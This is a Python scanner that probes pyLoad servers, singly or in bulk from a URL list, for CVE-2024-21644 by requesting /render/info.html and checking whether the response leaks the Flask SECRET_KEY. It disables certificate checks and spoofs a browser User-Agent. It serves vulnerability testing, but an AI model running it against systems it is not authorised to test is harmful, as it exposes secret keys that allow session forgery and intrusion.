import requests
from urllib.parse import urlparse,urljoin
import argparse
import urllib3
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def read_file(file_path):
    """Read target URLs from *file_path*, one URL per line.

    Lines are stripped of surrounding whitespace and blank lines are
    skipped, so a trailing newline or an accidental empty line does not
    produce a bogus empty scan target.

    :param file_path: path to a newline-separated list of URLs
    :return: list of non-empty URL strings
    """
    # Explicit encoding avoids platform-dependent defaults (e.g. cp1252
    # on Windows) mangling non-ASCII hostnames.
    with open(file_path, 'r', encoding='utf-8') as file:
        return [line.strip() for line in file if line.strip()]



def check(url):
    """Probe *url* for pyLoad CVE-2024-21644 (unauthenticated info leak).

    Requests ``/render/info.html`` on the target; a 200 response whose
    body echoes Flask configuration keys (``SECRET_KEY`` and
    ``SESSION_COOKIE_SECURE``) indicates the instance leaks its full
    configuration to unauthenticated clients.

    :param url: base URL of the pyLoad instance (trailing slash optional)
    :return: True if the target appears vulnerable, False otherwise
        (including on request errors, which are printed but do not abort
        a batch scan).
    """
    headers = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        'Content-Type': 'text/xml'
    }
    try:
        url = url.rstrip('/')
        target = urljoin(url, '/render/info.html')
        # verify=False: scan targets commonly run self-signed certs;
        # warnings are silenced at module import time.
        response = requests.get(target, verify=False, headers=headers, timeout=15)
        if response.status_code == 200 and 'SECRET_KEY' in response.text and 'SESSION_COOKIE_SECURE' in response.text:
            print(f"\033[31mDiscovered:{url}: pyLoad_CVE-2024-21644_infoleakage!\033[0m")
            return True
    except Exception as e:
        # Best-effort batch scanning: report the error for this target
        # and keep going instead of aborting the whole run.
        print(e)
    # Explicit False (original fell through to None) so callers get a
    # consistent boolean.
    return False


if __name__ == "__main__":
    # CLI entry point: scan a single URL (-u) or every URL listed in a
    # file (-f), one per line.
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    if args.url:
        check(args.url)
    elif args.txt:
        for url in read_file(args.txt):
            check(url)
    else:
        # No target supplied — show usage instead of exiting silently.
        parser.print_help()